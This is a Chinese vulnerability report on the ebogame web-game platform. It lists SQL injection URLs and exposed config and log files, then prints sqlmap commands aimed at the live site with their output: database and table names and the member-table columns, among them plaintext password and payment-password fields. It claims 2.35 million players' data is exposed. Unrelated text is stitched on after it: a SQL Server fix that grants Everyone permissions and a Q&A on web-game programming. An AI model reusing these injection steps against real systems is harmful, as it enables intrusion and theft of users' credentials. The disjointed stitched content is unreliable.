ebogame页游平台多处存在SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)
ebogame页游平台多处存在SQL注入(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与密码泄漏。
做的好渣。
1.https://**.**.**/gameing.phpurl=http%3A%2F%2Fs1.ebogame.yjxy.mlong.cn_
2.https://**.**.**/codereceive.phpcid=2545_
3.https://**.**.**/news.phpcontentid=2296_
4.https://**.**.**/news.phpcontentid=1407
以上是sql注入点。
1.https://**.**.**/caches/configs/database.php
泄漏mysql密码但是不让外联
https://sglj.ebogame.com/log.txt
https://ebo.ebogame.com/log.txt
https://www.ebogame.com/log.txt
泄漏订单信息，还有今天的。
sqlmap.py -u &https://www.ebogame.com/codereceive.php?cid=2545& -D ebogame --tables &&C:\test.txt
available databases [13]:
[*] 5ebo_bbs
[*] 5ebo_oa
[*] 5ebo_ucenter
[*] 5ebo_www
[*] 5ebo_www_test
[*] eboedu
[*] ebogame
[*] ebogame_1
[*] information_schema
Database: ebogame
[338 tables]
+-----------------------------------+
| api_send_mail |
| bbs_actlogs |
| bbs_apclog |
| bbs_beg |
| bbs_bmbcode |
| bbs_contacts |
| bbs_emoticons |
| bbs_favorites |
| bbs_forumdata |
| bbs_gueststat |
| bbs_invite |
| bbs_lastest |
| bbs_levels |
| bbs_onlinestat |
| bbs_polls |
| bbs_posts |
| bbs_potlog |
| bbs_primsg |
| bbs_schedule |
| bbs_search |
| bbs_shareforum |
| bbs_tags |
| bbs_threads |
| bbs_ugoptlist |
| bbs_usergroup |
| bbs_userlist |
| ebogame_activation |
| ebogame_advertising |
| ebogame_advertising_click |
| ebogame_bbs |
| ebogame_bbs_section |
| ebogame_category |
| ebogame_charge |
| ebogame_charge_ |
| ebogame_charge_bf |
| ebogame_charge_copy |
| ebogame_charge_heepay |
| ebogame_content |
| ebogame_extension |
| ebogame_extension_member |
| ebogame_extension_percent |
| ebogame_extension_settlemen |
| ebogame_extension_settlemen_once |
| ebogame_game_areas |
| ebogame_game_code |
| ebogame_game_gift_code |
| ebogame_game_gift_code_ |
| ebogame_game_gift_code_17173 |
| ebogame_game_gift_info_ |
| ebogame_game_gift_info_17173 |
| ebogame_games |
| ebogame_integral |
| ebogame_member |
| ebogame_member_char |
| ebogame_member_info |
| ebogame_member_integral |
| ebogame_member_login |
| ebogame_member_price |
| ebogame_member_serv |
| ebogame_news |
| ebogame_pictures |
| ebogame_price |
| ebogame_question_reply |
| ebogame_questions |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_mobile_setting |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| sglj_charge |
| sglj_coin |
| sglj_extension |
+-----------------------------------+
ebogame_member
sqlmap.py -u &https://www.ebogame.com/codereceive.php?cid=2545& -D ebogame -T ebogame_member --columns
Database: ebogame
Table: ebogame_member
[24 columns]
+----------------+-----------+
| Column | Type |
+----------------+-----------+
| 56xiu_id | char(50) |
| codestate | int(1) |
| display | int(1) |
| error_count | int(1) |
| error_time | int(11) |
| id | int(11) |
| integral | int(11) |
| integral_get | int(11) |
| integral_use | int(11) |
| name | char(20) |
| newip | char(20) |
| newtime | int(11) |
| oldip | char(20) |
| oldtime | int(11) |
| password | char(40) |
| password_nomd5 | char(20) |
| password_old | char(20) |
| pay_pass | char(40) |
| pay_pass_nomd5 | char(20) |
| regtime | int(11) |
| role | char(2) |
| times | int(11) |
| urlsource | char(100) |
| yiqidd_id | int(11) |
+----------------+-----------+
帐号可以直接登录
解决方案：当前位置: >>> SQL附加数据库错误，错误5123
SQL附加数据库错误，错误5123
原因： 你存放MDF数据库文件的磁盘格式是NTFS，所以没有执行权限。
解决方法： 在对应的MDF文件上右键--属性--安全，添加Everyone权限，如上图。
如果不行，将父文件夹也添加Everyone权限。
责任编辑：jacket
当前文章网址： 转载请注明出处！先锋游戏知道信息频道欢迎您
WEB网页游戏是用什么语言和数据库开发?
[欢乐猪] [ 21:12:07] (<span id="tgd) (<span id="tfd) &&
问题详情web原来的大型网游是安装在电脑上的,现在网上慢慢出现很多web网游了像猫扑的&&猫游记&&之类的请问web网页游戏是用什么语言开发的呢?用什么数据库想要学习开发这个,需要学哪些方面的知识???最佳答案服务器端什么语言都可以,php,asp,,jsp，只要能交互就行...小型的数据库可以用access其他比较大型的一般这样配合...asp,用sql2000jsp,php用mysql,oracle客户端一般都是html+javascript，当然还可以用flash...学这个，可能要涉及到html/javascript/服务器/数据库/动态网页技术..等等..
昵称： 验证码：
评论仅供网友表达个人看法，并不表明本站同意其观点或证实其描述
网页游戏相关知识
网页游戏其他问题
网页游戏资讯推 荐 游 戏
您当前位置： >
最新数据分析
热门游戏推荐